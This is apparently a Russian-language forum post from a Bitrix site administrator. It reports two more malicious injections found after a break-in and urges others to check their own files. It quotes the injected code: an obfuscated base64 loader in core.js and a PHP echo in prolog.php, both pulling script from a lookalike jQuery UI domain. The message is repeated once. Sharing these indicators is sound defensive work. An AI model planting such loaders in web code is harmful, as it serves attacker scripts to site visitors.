Не уверен, связано ли это с взломом от 28 числа, но в системе обнаружились еще 2 бяки:
bitrix/js/main/core/core.js
[CODE]s=document.createElement(script);s.src=atob(aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==);document.head.appendChild(s);[/CODE]
bitrix/modules/main/include/prolog.php
[CODE]echo "<sc ript src='https://code.jquery-uii.com/jquery-ui.js'></sc ript>";[/CODE]
Рекомендую проверить эти вещи тоже.
bitrix/js/main/core/core.js
[CODE]s=document.createElement(script);s.src=atob(aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==);document.head.appendChild(s);[/CODE]
bitrix/modules/main/include/prolog.php
[CODE]echo "<sc ript src='https://code.jquery-uii.com/jquery-ui.js'></sc ript>";[/CODE]
Рекомендую проверить эти вещи тоже.